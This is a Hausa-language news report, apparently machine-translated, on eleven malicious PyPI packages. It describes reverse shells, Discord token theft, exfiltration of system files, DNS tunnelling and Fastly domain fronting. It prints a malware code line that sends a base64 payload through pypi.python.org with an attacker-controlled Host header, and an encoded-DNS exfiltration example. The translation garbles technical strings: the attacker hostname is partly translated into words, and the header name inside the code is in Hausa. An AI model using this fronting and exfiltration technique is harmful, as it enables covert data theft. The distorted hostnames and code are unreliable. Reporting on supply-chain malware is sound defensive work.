A cikin kundin adireshi na PyPI (Python Package Index), an gano fakiti 11 da ke ɗauke da lambar mugunta. Kafin a gano matsalolin, an zazzage fakitin kusan sau dubu 38 gabaɗaya. Fakitin ƙeta da aka gano sun shahara saboda amfani da nagartattun hanyoyin don ɓoye hanyoyin sadarwa tare da sabar maharan.
- muhimmi (6305 zazzagewa), fakiti mai mahimmanci (12897) - kafa haɗi zuwa uwar garken waje a ƙarƙashin sunan haɗawa zuwa pypi.python.org don samar da damar harsashi zuwa tsarin (harsashi baya) kuma yayi amfani da shirin trevorc2 don ɓoye tashar sadarwa.
- pptest (10001), ipboards (946) - amfani da DNS azaman tashar sadarwa don watsa bayanai game da tsarin (a cikin fakiti na farko sunan mai watsa shiri, kundin aiki, IP na ciki da waje, a na biyu - sunan mai amfani da sunan mai watsa shiri) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - gano alamar sabis na Discord a cikin tsarin kuma ya aika zuwa ga mai watsa shiri na waje.
- trrfab (287) - aika mai ganowa, sunan mai watsa shiri da abinda ke ciki na /etc/passwd, /etc/hosts,/gida ga mai masaukin waje.
- 10Cent10 (490) - kafa haɗin haɗin harsashi tare da mai masaukin waje.
- yandex-yt (4183) - ya nuna saƙo game da tsarin da aka lalata kuma an tura shi zuwa shafi tare da ƙarin bayani game da ƙarin ayyuka da aka bayar ta hanyar nda.ya.ru (api.ya.cc).
Musamman bayanin kula shine hanyar samun damar runduna ta waje da aka yi amfani da su a cikin mahimman fakiti da fakiti masu mahimmanci, waɗanda suka yi amfani da hanyar sadarwar isar da abun ciki da sauri da aka yi amfani da su a cikin jagorar PyPI don ɓoye ayyukansu. A zahiri, an aika buƙatun zuwa uwar garken pypi.python.org (ciki har da tantance sunan python.org a cikin SNI a cikin buƙatun HTTPS), amma taken “Mai watsa shiri” na HTTP ya haɗa da sunan uwar garken da maharan ke sarrafawa (sec. gaba.io. duniya.samfurin.fastly.net). Cibiyar isar da abun ciki ta aika da irin wannan buƙatun zuwa uwar garken mai kai hari, ta amfani da sigogin haɗin TLS zuwa pypi.python.org lokacin aika bayanai.
Ana amfani da kayan aikin PyPI ta hanyar hanyar sadarwa ta isar da abun ciki da sauri, wanda ke amfani da wakili na Varnish don adana buƙatun na yau da kullun, kuma yana amfani da sarrafa takaddun shaida na TLS a matakin CDN, maimakon a ƙarshen sabar, don tura buƙatun HTTPS ta hanyar wakili. Ba tare da la'akari da mai watsa shiri ba, ana aika buƙatun zuwa wakili, wanda ke ƙayyade mai masaukin da ake so ta amfani da taken HTTP "Mai watsa shiri", kuma sunayen yankin mai masaukin suna an ɗaure su da adiresoshin IP na CDN masu daidaita ma'auni waɗanda ke da kyau ga duk abokan ciniki na Fastly.
Har ila yau, uwar garken maharan yana yin rajista tare da CDN Fastly, wanda ke ba da tsare-tsare kyauta ga kowa da kowa har ma yana ba da damar yin rajistar da ba a san su ba. Yana da mahimmanci cewa don aika buƙatun ga wanda aka azabtar lokacin ƙirƙirar "harsashi na baya", ana kuma amfani da makirci, amma an fara shi daga gefen maharin. Daga waje, hulɗa tare da uwar garken maharan yana kama da halaltaccen zama tare da kundin adireshin PyPI, rufaffen ta amfani da takardar shaidar PyPI TLS. Irin wannan fasaha, wanda aka sani da "yankin gaba," an riga an yi amfani da shi sosai don ɓoye sunan mai masaukin lokacin da ke ƙetare toshewa, ta amfani da ikon da aka bayar a wasu cibiyoyin sadarwa na CDN don samun damar HTTPS ta hanyar nuna wani mai watsa shiri a cikin SNI kuma a zahiri watsa sunan wanda aka nema a cikin shugaban Mai watsa shiri na HTTP a cikin zaman TLS.
Don ɓoye munanan ayyuka, an kuma yi amfani da kunshin TrevorC2 don yin hulɗa tare da sabar mai kama da kewayawa yanar gizo na yau da kullun, alal misali, an aika da buƙatun ɓarna ƙarƙashin sunan zazzage hoton "https://pypi.python.org/images/ guid=” tare da rufaffen bayanai a cikin sigar jagora. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, headers = {'Mai watsa shiri': "psc.forward.io.global.prod.fastly.net"})
Fakitin pptest da ipboards sun yi amfani da wata hanya ta daban don ɓoye ayyukan cibiyar sadarwa, dangane da ɓoye bayanai masu amfani a cikin tambayoyin zuwa uwar garken DNS. Malware yana watsa bayanai ta hanyar aiwatar da buƙatun DNS kamar "nu4timjagq4fimbuhe.example.com", wanda a ciki aka sanya bayanan da aka aika zuwa uwar garken sarrafawa ta amfani da tsarin base64 a cikin sunan yanki. Maharin yana karɓar waɗannan saƙonni ta hanyar sarrafa uwar garken DNS don yankin example.com.
source: budenet.ru